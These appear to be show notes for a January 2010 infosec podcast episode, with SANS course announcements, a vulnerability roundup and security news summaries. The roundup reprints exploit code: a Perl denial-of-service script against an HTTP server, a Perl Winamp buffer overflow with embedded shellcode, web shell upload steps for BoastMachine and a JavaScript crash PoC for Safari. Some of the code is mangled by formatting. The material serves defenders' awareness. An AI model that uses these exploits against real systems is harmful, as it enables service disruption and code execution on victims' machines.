Episode 55 – Taint Garden

InfoSec Podcast Episode 55 for January 27, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

SEC-606: Drive and Data Recovery Forensics    2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth    2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems    3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression    4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth    5/17/10 to 5/21/10

Go online to register by going to the SANS website or call (301) 654-SANS(7267).

SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)

Vulnerabilities of Interest:

1. P2GChinchilla HTTP Server version 1.1.1 is subject to a remote denial of service.  Exploit code is availabe:

#!/usr/bin/perl
# File Name 2GChinchilla[TM] HTTP Server
# Vuln : Remote Denial Of Service Exploit
# Auther : Zer0 Thunder
# Msn : zer0_thunder@colombohackers.com
#
#
##==——>>
#
# Exploit Title: P2GChinchilla[TM] HTTP Server 1.1.1 Remote Denial Of
Service Exploit
# Date: 22/01/2010
# Author: Zer0 Thunder
# Site : http://www.proggies2go.org/pages/p2gChinchilla.html?ref=PAD
# Software Link:

http://www.proggies2go.org/pages/p2gChinchilla/p2gChinchilla.rar

# Version: v 1.1.1
# Tested on: Server runs on Windows XP Sp2 /Test on Remote Location
##==——>>
use IO::Socket::INET;
$ip = $ARGV[0];
$port = $ARGV[1];
if (! defined $ARGV[0])
{
print
“t+================================================================+n&
quot;;
print “t+ — P2GChinchilla[TM] HTTP Server 1.1.1 Denial Of Service
—+n”;
print “t+ — Author :Zer0 Thunder
—+n”;
print “t+ — DATE: :[24/01/2010]
—+n”;
print “t+ — ————————————————
—+n”;
print “t+ — Usage :perl exploit.pl [Host/Remote IP] [Port]
—+n”;
print “t+ —
—+n”;
print
“t+================================================================+n&
quot;;
print “n”;
print ” Ex : exploit.pl localhost 50000n”; # P2GChinchilla
Default Port is 50000

exit;
}

print
“t+================================================================+n&
quot;;
print “t+ — P2GChinchilla[TM] HTTP Server 1.1.1 Denial Of Service
—+n”;
print “t+ — Author :Zer0 Thunder
—+n”;
print “t+ — DATE: :[24/01/2010]
—+n”;
print “t+ — ————————————————
—+n”;
print “t+ — Usage :perl exploit.pl [Host/Remote IP] [Port]
—+n”;
print “t+ —
—+n”;
print
“t+================================================================+n&
quot;;
print “n”;
print ” Wait Till The Buffer is Donen”;
my $b1 = “x41″ x 100000000;
print “n”;
print ” DoS is UP !.. N Give it a Second n”;

$DoS=IO::Socket::INET->new(“$ip:$port”) or die;

print $DoS “stor $b1n”;
print $DoS “QUITn”;

close $DoS;

# exit :

1. The login page of the F2L-3000 version 4.0.0 is vulnerable to SQL Injection. Exploitation of the vulnerability may allow attackers to bypass
   authentication and access sensitive information stored on the device.  A patch is not available at this time. Possible workarounds include
   disabling the vulnerable service, or limiting access to a set of trusted IP addresses.
2. Winamp version 5.572 is subject to local buffer overflow.  Exploit code is available:

#!/usr/bin/perl

# Still learning, having some fun…
# Greetz to _-Sid-_ >Roadkill< Jess Dawn Linki
# Special greetz do Debug, even i dont know you. Nice find man.
# Exploit has something around 70% chance of success.

print “n#########################################n”;
print “# Winamp 5.572 stack buffer overflow #n”;
print “# PoC by: Debug (eldadru@gmail.com) #n”;
print “# Exploit by: NeoCortex (ICQ 158005940) #n”;
print “#########################################n”;

print ” __ __________________n”;
print ” ________ / \ / / ____ / ____ /
________n”;
print ” ________ /_______/ / /\ \ / / /___/ / / / / /_______/
________ n”;
print ” /_______/ _______ / / \ \ / / /_____/ / / / ________
/_______/n”;
print ” /_______/ / / \ \/ / /_____/ /___/ /
/_______/n”;
print ” /_/ \__/_______/_______/n”;
print ” Where’s the next phone box to the matrix
please?nnn”;

my $version = “Winamp 5.572″;

my $junk = “x41″ x 540;
my $eip = “xadx86x0ex07″; # overwrite EIP – 070E86AD FFD4 CALL
ESP nde.dll
my $nop = “x90″ x 100;

my $shellcode =
# payload taken from http://www.metasploit.com
# windows/exec cmd=calc.exe
“xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49″.
“x49x49x49x49x49x49x49x49x49x49x49x51x48x5ax6ax47″.
“x58x30x42x31x50x42x41x6bx42x41x57x42x32x42x41x32″.
“x41x41x30x41x41x58x50x38x42x42x75x78x69x6bx4cx6a”.
“x48x53x74x67x70x67x70x75x50x4ex6bx53x75x65x6cx6e”.
“x6bx51x6cx46x65x70x78x43x31x68x6fx4ex6bx30x4fx54″.
“x58x6ex6bx73x6fx57x50x67x71x58x6bx77x39x4cx4bx64″.
“x74x6cx4bx57x71x5ax4ex76x51x49x50x6ex79x6ex4cx4f”.
“x74x4bx70x70x74x37x77x69x51x48x4ax64x4dx43x31x4f”.
“x32x7ax4bx48x74x55x6bx72x74x34x64x77x74x70x75x4d”.
“x35x6cx4bx71x4fx75x74x36x61x48x6bx41x76x4cx4bx44″.
“x4cx70x4bx4ex6bx63x6fx55x4cx33x31x68x6bx4ex6bx35″.
“x4cx4ex6bx34x41x6ax4bx6cx49x33x6cx35x74x64x44x4a”.
“x63x34x71x4bx70x63x54x6ex6bx71x50x76x50x4fx75x4b”.
“x70x72x58x74x4cx4cx4bx77x30x76x6cx4cx4bx44x30x57″.
“x6cx6cx6dx6ex6bx75x38x54x48x58x6bx73x39x6ex6bx4b”.
“x30x4ex50x37x70x67x70x37x70x6cx4bx62x48x45x6cx63″.
“x6fx35x61x39x66x35x30x50x56x4dx59x48x78x6ex63x59″.
“x50x43x4bx66x30x43x58x68x70x6fx7ax43x34x33x6fx73″.
“x58x4fx68x6bx4ex6dx5ax46x6ex72x77x6bx4fx78x67x63″.
“x53x62x41x30x6cx55x33x64x6ex42x45x70x78x32x45x33″.
“x30x47″;

open (myfile,’>> whatsnew.txt’);
print myfile $version.$junk.$eip.$nop.$shellcode;

print “[+] whatsnew.txt written.n”;
print “[ ] Now copy it to your winamp folder…n”;
print “[ ] Run winamp and hit [About Winamp]->[Version
History]n”;

4.      BoastMachine version 3.1 is subject to a remote shell upload vulnerability.
·        First join in the Site /Server/path/register.php

• Login in the Site/Server/path/login.php
• After login, go to /Server/path/bmc/files.php?form_id=new
• Now upload your shell like ( Shell.php.rar ) and you will find your shell here /Server/path/files/username_Shell.php.rar
• http://sample.com/hp_boastMachine/files/username_Shell.php.rar

5.  Safari version 4.0.4 is subject to a javascript crash denial of service vulnerability.  The following piece of javascript will crash Safari nicely when triggered using one of the methods described below. PoC code is available:
<script>
var data = “A”;
while(data.length<0×40000){
data += data;
}
data2 = new Array();
for (x=0; x<4000; x++){
data2[x] = data+data;
}
</script>

News Items of Interest:

News item 1:http://www.benedelman.org/news/012610-1.html
Do you run Google’s Toolbar? Did you disable the transmitting to Google of the full URL of every page-view, including searches at competing search engines. Apparently, even if a users wants to disable such a transmission it’s fairly easy to turn them off, right?  You might be surprised to learn that apparently disable means don’t disable when you’re using “Enhanced Features” mode.

Which by the way, the standard Google Toolbar installation encourages users to activate via a “bubble” message shown at the conclusion of installation.  The bubble presents a forceful request for users to activate Sidewiki: Which is described as “enhanced” and “helpful”, and Google chooses to tout it with a prominence that indicates Google views the feature as important. Moreover, the accept button features bold type plus a jumbo size (more than twice as large as the button to decline). And the accept button has the focus – so merely pressing Space or Enter (easy to do accidentally) serves to activate Enhanced Features without any further confirmation

News item 2:  http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3211151
Hacker best known for cracking Apple’s iPhone says he’s done it again, this time with Sony’s PlayStation 3. In a blog post, George Hotz said that after a five-week effort, he’d finally managed to run his own software on the PlayStation 3, which typically only plays digitally signed software that is approved by Sony. “I have read/write access to the entire system memory, and [hypervisor] level access to the processor,” he wrote. “In other words, I have hacked the PS3.”  He pulled off the feat using “very simple hardware, cleverly applied, and some not so simple software,” he added.

News item 3: http://news.cnet.com/8301-1009_3-10442305-83.html?part=rss&subj=news&tag=2547-1_3-0-20

The “Verified by Visa” credit-card authentication system has come under criticism from Cambridge University researchers, who say it is training online shoppers to adopt risky security habits.

The feature, which is used to authenticate online financial transactions, confuses people by not displaying security cues, security engineering researchers Ross Anderson and Steven Murdoch said in a paper (PDF) published Tuesday.

The primary purpose of 3DS is to allow a merchant to establish whether a customer controls a particular card number. It is essentially a single-sign on system, operated by Visa and MasterCard, and it diers in two main ways from existing schemes such as OpenID or InfoCard.

3D Secure is an XML-based protocol used as an added layer of security for online credit and debit card transactions. It was developed by Visa to improve the security of Internet payments and offered to customers as the Verified by Visa service. Services based on the protocol have also been adopted by MasterCard, under the name MasterCard SecureCode, and by JCB International as J/Secure.

3-D Secure adds another authentication step for online payments. Merchants are encouraged to use 3-D Secure to achieve higher coverage against fraud losses. When a merchant does not use 3-D Secure they are liable for fraudulent transactions even if the transaction was properly authorized.  3-D Secure should not be confused with the Card Security Code which is a short numeric code that is printed on the card.

Before 3DS can be used to authenticate transactions, cardholders must register a password with their bank. A reasonably secure method would be to send a password to the customer’s registered address, but to save money the typical bank merely solicits a password online the 1st time the customer shops online with a 3DS enabled card { known as activation during shopping (ADS).

News item 4:http://www.computerworld.com/s/article/9149218/Bank_sues_victim_of_800_000_cybertheft?
A Texas bank is suing a customer hit by an $800,000 cybertheft incident in a case that could test the extent to which customers should be held responsible for protecting their online accounts from compromises.  In November, unknown attackers based in Romania and Italy initiated a series of unauthorized wire transfers from Hillary’s bank accounts and depleted it by $801,495. About $600,000 of the amount was later recovered by PlainsCapital. Hillary demanded that the bank repay it the rest of the stolen money. In a letter to the bank in December, Hillary claimed that the theft happened only because PlainsCapital had failed to implement adequate security measures. The bank sought to absolve itself from blame in the heist by stating that the unauthorized wire transfer orders had been placed by someone using valid Internet banking credentials belonging to Hillary Machinery. “PlainsCapital accepted the wire transfer orders in good faith,” and had therefore not breached any of its agreements with Hillary, the bank said in its complaint.

The case is also unusual because it is believed to be the first bank to launch a pre-emptive lawsuit against a customer victimized by a cyber theft. Several other cases, where companies that have been victims of such thefts have sued their banks for failing to implement reasonable security measures, are pending in courts around the country.

Hillary is still deciding its next steps, but according to its lawyer, Patrick Madden, the company will next file a response asserting that it was the bank’s failure to employ suitable security controls that resulted in the theft.
News item 5: http://www.omaha.com/article/20100126/NEWS97/701269885
Federal prosecutors in California say a Nebraska man will plead guilty to participating in a cyber attack on Church of Scientology Web sites in January 2008.

Brian Thomas Mettenbrink agreed to plead guilty Monday to the misdemeanor charge of unauthorized access of a protected computer, said Thom Mrozek, a spokesman for the U.S. attorney’s office in Los Angeles. Mettenbrink faces a year in federal prison.

Court records say Mettenbrink attacked Scientology Web sites as part of Anonymous, an underground group that protests the Church of Scientology, accusing it of Internet censorship.

Prosecutors say hackers conducted a “denial of service” attack, in which computers flood a target Web site with malicious Internet traffic, making it unavailable to legitimate users.

News item 6: http://news.techworld.com/security/3211146/researcher-reveals-another-ie-security-flaw/?olo=rss

A flaw in Microsoft’s Internet Explorer could allow a hacker to read files on a person’s computer, according to a security researcher. The claim represents another problem for the company just days after a serious vulnerability received an emergency patch. The problem was actually discovered as long as two years ago but has persisted despite two attempts by Microsoft to fix it, said Jorge Luis Alvarez Medina, a security consultant with Core Security Technologies. He is scheduled to give a presentation at Washington’s Black Hat conference on 3 February.

News item 7: http://blog.commandlinekungfu.com/